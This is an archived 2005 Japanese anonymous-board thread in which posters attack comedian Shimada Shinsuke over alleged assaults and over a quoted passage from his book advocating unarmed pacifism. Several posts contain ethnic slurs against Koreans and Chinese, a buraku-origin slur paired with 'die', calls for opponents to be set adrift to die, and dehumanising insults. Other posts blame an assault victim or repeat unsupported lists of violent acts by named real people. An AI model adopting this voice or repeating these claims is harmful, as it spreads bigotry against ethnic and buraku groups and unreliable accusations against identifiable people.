C娘鼻血事件 挨拶をしなかっただけでリンチ
D嫁殴打事件 顔面を殴打、前歯を折る
E鈴鹿事件 タイムの計測をミスした女性に暴行
Fスッチー事件2 パペポで鶴瓶が告白、またしても些細な事でブチギレ
G伊丹事件 声かけた相手を罵り警察までかけつける騒ぎをおこす
二年前「サンデー毎日」にスクープされる。
ただ単に「ハロー」と声を掛けられただけで逆上(ほとんどキチ○イ)
Hアイドル殴打事件 某アイドルにビンタ
I3年前の5月、大阪・関西テレビの「太っ腹!紳助ファン」収録中
若手芸人コンビ「麒麟」田村が紳助を「面白くない芸人」とネタにした。
怒った紳助、客の前で田村の髪の毛をつかみ殴る蹴るの暴行。
さらに楽屋に連れて行き、壁に田村の頭をぶち当てた。


424 :番組の途中ですが名無しです:2005/05/08(日) 12:53:53 ID:4dpXhrEu0 ?#
前の選挙で、しんすけが民主党の奴を応援したおかげで辻本キヨミが落ちた
そこだけは評価できる

425 :番組の途中ですが名無しです:2005/05/08(日) 12:59:47 ID:pJiA5pUy0 ?##
なりすまし日本人張公彦

426 :番組の途中ですが名無しです:2005/05/08(日) 13:01:23 ID:dlTueKYvO
てか、十年前から経済制裁って言ってたの?
で、まだやってないの?何やってんだか(´・ω・`)

427 :番組の途中ですが名無しです:2005/05/08(日) 13:02:30 ID:QTd8nH770
無抵抗の女を殴った人が言うと心に染みますね

428 :番組の途中ですが名無しです:2005/05/08(日) 13:10:54 ID:PpcdOYbeO
さすが民主党から出馬間近だった人は違うわ

429 :番組の途中ですが名無しです:2005/05/08(日) 13:12:39 ID:l+RDGcG50
これ、皮肉で言ってるんじゃない?

430 :番組の途中ですが名無しです:2005/05/08(日) 13:31:00 ID:ADB5yeYd0
こういう敗北主義者をメガフロートにのっけて
日本海に放流したらいいと思う。
勝手に氏んでいくだろ

431 :番組の途中ですが名無しです:2005/05/08(日) 16:51:23 ID:QTd8nH770
そうだな

432 :番組の途中ですが名無しです:2005/05/08(日) 17:06:52 ID:7Au6aVxZ0
下っ端のタレントを雪山に放置して凍傷にさせて足の指を切断させたにもかかわらず
相変わらずクイズ伸介君は大阪でやっているわけだが


433 :番組の途中ですが名無しです:2005/05/08(日) 17:09:57 ID:5zG1Wunk0
@紳竜時代、客席で野次った客に暴行
A同じく、バラエティ番組でデレクターに暴行
Bスッチー事件 些細なことで難癖つけて相手を罵り泣くまで説教する
C娘鼻血事件 挨拶をしなかっただけでリンチ
D嫁殴打事件 顔面を殴打、前歯を折る
E鈴鹿事件 タイムの計測をミスした女性に暴行
Fスッチー事件2 パペポで鶴瓶が告白、またしても些細な事でブチギレ
G伊丹事件 声かけた相手を罵り警察までかけつける騒ぎをおこす
二年前「サンデー毎日」にスクープされる。
ただ単に「ハロー」と声を掛けられただけで逆上(ほとんどキチ○イ)
Hアイドル殴打事件 某アイドルにビンタ
I3年前の5月、大阪・関西テレビの「太っ腹!紳助ファン」収録中
若手芸人コンビ「麒麟」田村が紳助を「面白くない芸人」とネタにした。
怒った紳助、客の前で田村の髪の毛をつかみ殴る蹴るの暴行。
さらに楽屋に連れて行き、壁に田村の頭をぶち当てた。


434 :番組の途中ですが名無しです:2005/05/08(日) 17:15:27 ID:5zG1Wunk0
下っ端のタレントを雪山に放置して凍傷にさせて足の指を切断させたにもかかわらず
相変わらずクイズ伸介君は大阪でやっているわけだが


435 :番組の途中ですが名無しです:2005/05/08(日) 17:22:43 ID:VpVj2hfl0
>>1
俺は間違っても、怒り狂っても女にツバなど吐きかけないが、
いざと言う時には、武器持って戦うぞ。生存権行使だ。

日本の主権が侵されたら、徴兵されても文句言わんぞ。
無法者はぶっ殺すぞ。何か問題か?伸介君。

436 :番組の途中ですが名無しです:2005/05/08(日) 17:23:23 ID:9AO9km1QO
両手の指も切断した気がする
あと、細川ふみえに『乳半分出してオナニーのネタになってる様な奴が偉そうにするな』
と説教して、裁判の一歩手前までいったな

437 :番組の途中ですが名無しです:2005/05/08(日) 17:28:48 ID:0WUc54W90
確かに最近、ちょっと奇妙な言動が目立つな。
トーク番組で電波宗教的なこと必死に言ったり、
よく分からん新興宗教にハマってる元X-Japanの
すごくエラのはった人の事を必死で持ち上げたり、
民主党を応援したり、、、

この前の暴力の件は女のほうもキモそうなので別にいいけど。

438 :番組の途中ですが名無しです:2005/05/08(日) 17:59:05 ID:8eEl/Gnn0
・拳で顔を5〜6発 ネガネのへしゃげるほど殴られた
・リュックの中の防虫スプレーのカンがつぶれるほど壁に打ち付けられた
その結果
・目に見える傷の報道がない (皮下出血(あざ)、皮下血腫(コブ)、皮膚擦過傷(かすり傷)等は一切報告されていない)

女40の話を信用してもいいの?
なんか紳助さんが可愛そうです

まあ 目に見える傷(皮下出血(あざ)、皮下血腫(コブ)、皮膚擦過傷(かすり傷)があれば 女40に同情する人(自分も含む)は多かったと思うよ。

439 :番組の途中ですが名無しです:2005/05/08(日) 18:28:44 ID:VpVj2hfl0
>>438
どんなことがあろうが女にツバを吐く行為は日本にはない。
朝鮮人、中国人のすること。
大和民族にそのような風習はない。武士道以前の行為。

死んで詫びろ。さもなくば、日本から出てけ。それだけだ。

440 :番組の途中ですが名無しです:2005/05/08(日) 20:05:15 ID:OiEP0w5h0
京都部落出身のハセガワキミヒコは
勝手に死んでください

441 :番組の途中ですが名無しです:2005/05/08(日) 20:07:43 ID:TkROWWVp0
自分の娘が目の前で犯され、殺されそうになっても
無抵抗なんですね、伸助って。

442 :番組の途中ですが名無しです:2005/05/08(日) 20:09:08 ID:o4p7xcNK0
ラオウに叱られそうなこと言ってるな

443 :番組の途中ですが名無しです:2005/05/08(日) 20:10:10 ID:H0n4LhA/0
無抵抗で死んでいきたいのなら一人で勝手にやってくれ。
ガンジーでも臆病より戦いを選ぶといっている。

444 :番組の途中ですが名無しです:2005/05/08(日) 20:13:47 ID:S/OYej9v0
武器は全部そろえる。パトリオットも買うと。来るなら来い、返り討ちです。
うちは最後まで平和憲法を守る。世界で類を見ない、憲法第9条を守りながら、
自衛の為に死んでいくことが、我々のメッセージだと。

憲法変えて、確立した平和憲法のもとで、平和憲法のもとで、最後まで戦おう。
国を守って死んでいこう。そうすることが一番や。今あらためて、そう、思いますね。
敗北したら大義名分は成り立たへんのやから。
北朝鮮に経済制裁したらいいじゃん。怒らせろ。大義名分が成り立ってしまうもん。
経済制裁する、日本も一緒にやる、それだけで向こうは攻める理由ができるもん。

著書「いつも心にマーシーを」より

445 :肉球 ◆NiKuQYxpwk :2005/05/08(日) 20:18:40 ID:YeuNQRjE0
経済制裁って八百屋とかで「お前には売らねえ」って言うもんでそ
それで殴ってきたら相手が悪いに決まってるじゃん

446 :番組の途中ですが名無しです:2005/05/08(日) 20:19:49 ID:jsI8V4XuO
リリーナ「完全平和主義万歳!」
ノイン「しんちゃんが狂った!」
リリーナ「女の癖に生意気や!」ボコボコ
ノイン「駅員さ〜ん。」

447 :番組の途中ですが名無しです:2005/05/08(日) 20:19:50 ID:lfU2eNiF0
まあ、伸助の言いたい事も判るが
>うちは最後まで平和憲法を守る。世界で類を見ない、憲法第9条を守りながら、
>無抵抗で死んでいくことが、我々のメッセージだと。
このメッセージは世界の歴史に「やっぱ平和憲法はダメなんだな」っていう反面教師としてしか残せないよ。
「社会主義は間違っていた」を世界中に追認させたレーニンみたいにね。

448 :番組の途中ですが名無しです:2005/05/08(日) 20:21:08 ID:7Zf43hvw0

===============================================================
 日本国憲法・第9条は、昭和29年に自衛隊が設立された時点で、国民の
意志と実力と行動によって黙殺された。現在、実質的に日本国憲法・第9条
は存在しない。紙の上には書いてあるが、支配システムとしては存在しない。
ここでハッキリと宣言しよう。
 
 日本国憲法・第9条は、もう死んでいる。
 
 与野党の論議は、たとえるなら50年も前に死んだ人間の明日の朝食の献
立について考えているようなものである。どちらも同じくらい間抜けである。
 憲法や法律というものは、書いてあるだけではダメなのだ。違反者に罰を
与えり、合法者に褒美を与える支配システムが存在し、それがルール通り
に動いていなければならない。
http://www.melma.com/mag/57/m00135057/a00000018.html
===============================================================

449 :番組の途中ですが名無しです:2005/05/08(日) 20:23:48 ID:5QmRdXmZ0
しっかし気持ち悪いメッセージだな。副業で儲けることばっか考えてる奴
が何言っても説得力ねえよ。

450 :番組の途中ですが名無しです:2005/05/08(日) 20:27:39 ID:rc0QWSQt0
つまり、これが世に出して貰った見返りか(w

451 :番組の途中ですが名無しです:2005/05/08(日) 20:38:25 ID:ZDmBDybf0
あのね、軍隊がダメなら個人の武装自由化だね
国が守ってくれないんだったら自力で戦うしかないじゃん
俺は黙って殺されたくないもん

452 :番組の途中ですが名無しです:2005/05/08(日) 20:43:09 ID:VpVj2hfl0
こういう奴に限って、いざと言う時に政府と自衛隊は何もしてくれなかった。
謝罪と賠償をしろとほざく。
イラク3馬鹿とその家族、市民団体と一緒。

日本の恥。人間のクズ。無用の生き物。カス。

453 :番組の途中ですが名無しです:2005/05/08(日) 20:43:45 ID:Z+ecfOrN0
この本持ってんだけど。
別に九条改正反対論者ではなく、『僕は憲法を変えないかんと思います。
変え方も二つあると思うんですよ。「軍隊をもってエエように変えよう」
というのと「絶対持てないように変えよう」というのと。どっちにしろ今の
憲法は、九条だけでも曖昧じゃないですか。拡大解釈できて』と語ってる。
んで、北朝鮮がミサイル撃ってきても防衛態勢ゼロなのに(94年当時)、
中途半端に武力を持ってても意味がないと、手をグーにして下ろしてる状態
よりも寝ころがってた方が相手は撃ちにくいと、はっきり「日本は軍隊を持たない」
と書いたほうがいいと。ただ、その場合にも米軍の基地は維持し続けた方がいい
とも書いてあるし、なんだかよくわからん内容だわ。

454 :番組の途中ですが名無しです:2005/05/08(日) 20:43:56 ID:e+1Tt/lg0 ?#
ラオウの前で言ってみろよ。

455 :番組の途中ですが名無しです:2005/05/08(日) 20:44:56 ID:nolUvgJq0
崇高な死を求めるのは青さの象徴ってな

456 :番組の途中ですが名無しです:2005/05/08(日) 20:47:28 ID:iJxGIXlb0
ま、よく考えもせずに書いた妄言ということで

457 :番組の途中ですが名無しです:2005/05/08(日) 20:47:43 ID:aYSEFnAV0
学生時代に、さんざん弱い者イジメやカツアゲやレイプまがいのことをして
多くの人に多大な損害を与えておきながら、
卒業式では色々あったと号泣する最低のDQNっているよな。
そういう感じで50近くまで来てしまったんだろう


458 :番組の途中ですが名無しです:2005/05/08(日) 20:49:14 ID:7PIT2rRV0
寝てようが無抵抗だろうが
殴るやつは殴るよな。
紳助自身が証明してる罠。

459 :番組の途中ですが名無しです:2005/05/08(日) 21:32:28 ID:ghIXERXf0
あいつ風見鶏だろ
弱いものに強く、強いものにへつらうからな
・チーム紳助時代はスポンサーのワンマン会社の理不尽な方針を頼まれも
せずにマイクで褒めまくってたし
・センパイ芸人の力関係見抜くのうまくて、誰につくかその場その場で
うまくやってたし
・高校時代は内申書だか成績証明のゲタはきの為に友達売ったし
芸風なんかじゃなく信用に値しないヤツってのは間違いないな
出世はするかもね

460 :番組の途中ですが名無しです:2005/05/08(日) 21:35:15 ID:vSbl48SZ0
> チーム紳助時代はスポンサーのワンマン会社の理不尽な方針を頼まれも
> せずにマイクで褒めまくってたし

SNKのことかーー!!


461 :番組の途中ですが名無しです:2005/05/08(日) 21:36:18 ID:Jkuad7rT0
つんくの2ショット
http://shinjuku0075.hp.infoseek.co.jp/tsunk_2shot/picture.html




462 :番組の途中ですが名無しです:2005/05/08(日) 21:40:35 ID:glZa0uJA0 ?#
靴べらが偉そうに

463 :番組の途中ですが名無しです:2005/05/08(日) 21:46:16 ID:5zG1Wunk0
最高の暴力魔

464 :番組の途中ですが名無しです:2005/05/08(日) 21:47:50 ID:fE8T8I/G0
こいつ自分が暴力の標的になったら絶対に抵抗するぞ
人には偉そうに無抵抗主義を語る人間ほど死に直面すると必死に抵抗する
そもそも女に言葉の暴力を受けただけで、殴り引きずりまわし唾を吐きかけるやつだからな
政治家の夢絶たれてもまだ未練あるんだろうな

465 :番組の途中ですが名無しです:2005/05/08(日) 22:11:14 ID:+EqUUXsg0
  ま   た   紳   助   か

466 :番組の途中ですが名無しです:2005/05/09(月) 03:13:17 ID:0yn93q790
最高の暴力魔

467 :番組の途中ですが名無しです:2005/05/09(月) 03:16:03 ID:0yn93q790
最高の暴力魔

468 :番組の途中ですが名無しです:2005/05/09(月) 03:33:17 ID:7NkuLw8L0
女40側の弁護士ってさ 共産系フェミ活動家大阪女性弁護士という噂がるけど
本当の話なの?
誰か教えてよ

469 :番組の途中ですが名無しです:2005/05/09(月) 03:40:12 ID:7NkuLw8L0
・拳で顔を5〜6発 ネガネのへしゃげるほど殴られた
・リュックの中の防虫スプレーのカンがつぶれるほど壁に打ち付けられた
その結果
・目に見える傷の報道がない (皮下出血(あざ)、皮下血腫(コブ)、皮膚擦過傷(かすり傷)等は一切報告されていない)

女40の話を信用してもいいの?
なんか紳助さんが可愛そうです

まあ 目に見える傷(皮下出血(あざ)、皮下血腫(コブ)、皮膚擦過傷(かすり傷)があれば 女40に同情する人(自分も含む)は多かったと思うよ。

470 :番組の途中ですが名無しです:2005/05/09(月) 03:43:38 ID:Sr4w40RB0
無抵抗の女に暴力振るうだけあって
言う事もあれだね

471 :番組の途中ですが名無しです:2005/05/09(月) 03:48:30 ID:wFWz8UVMO
丸腰無抵抗なら思想に準じて死んで行ける訳では決してない。
降伏した者は必ず侵略者の為に協力させられ、物資や人的資源を吸い上げられる。
それはすなわち侵略者の片棒を担ぐ行為。

472 :番組の途中ですが名無しです:2005/05/09(月) 03:56:16 ID:wFWz8UVMO
例えば、A国とB国が抗戦し、A国の軍用艦艇が日本の港に侵入してきた場合。
これを許せば補給基地を提供した事になり、A国に軍事的に援助を行った事になる。
そうしない為には入港を阻止しなくてはならないが、武力無くしてそれは出来ない。

ピュアホワイトのまま死ぬ事は決して出来ない

473 :番組の途中ですが名無しです:2005/05/09(月) 04:13:05 ID:XYblVfJS0
  平和憲法のもとで、無抵抗で戦おう。


  へ、            /´i^⌒丶
┌―OO ミ   , ・ 。 ゚  l i ┴ ┐ l
        . ;  .    Y= =丶V  _ 、、
   ∧_∧ヘ ゚ ' 人     ( 台) l6  _/ ,,  / /
  (Д`(#))) <  >;-=―丶,__、.ト     -' / /
    /⌒ ヾ)   Y  `ーミ_,)ヾ_ ⌒ヽ       ・ ・
    | |   ヽ           (_,二ノヽ
    i lヽ ヾ\          )  __ \
   (_ノ \ \\       (  ( \ \
        \ ,/⌒/⌒)    \ ヽ  \ \
         ヽ__/__/     (__)  (__)


474 :番組の途中ですが名無しです:2005/05/09(月) 05:11:18 ID:7NkuLw8L0
ビデオリサーチ調べ
総合視聴率ランキング(関東地区 4月25日〜5月1日)
順位  タイトル放送日放送局視聴率
1 めちゃ×2イケてるッ!4月30日フジテレビ23.4%
2 NHKニュース74月25日NHK総合23.2%
3 エンジン4月25日フジテレビ22.5%
4 報道ステーション4月25日テレビ朝日21.0%
5 義経5月1日NHK総合20.7%
6 ニュース・気象情報5月1日NHK総合20.4%
7 NHKニュース94月25日NHK総合19.9%
8 NHKニュース74月25日NHK総合19.8%
8 行列のできる法律相談所5月1日日本テレビ19.8%
10 SMAP×SMAP4月25日フジテレビ19.0%

http://tv.yahoo.co.jp/ranking/ranking.html


103 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)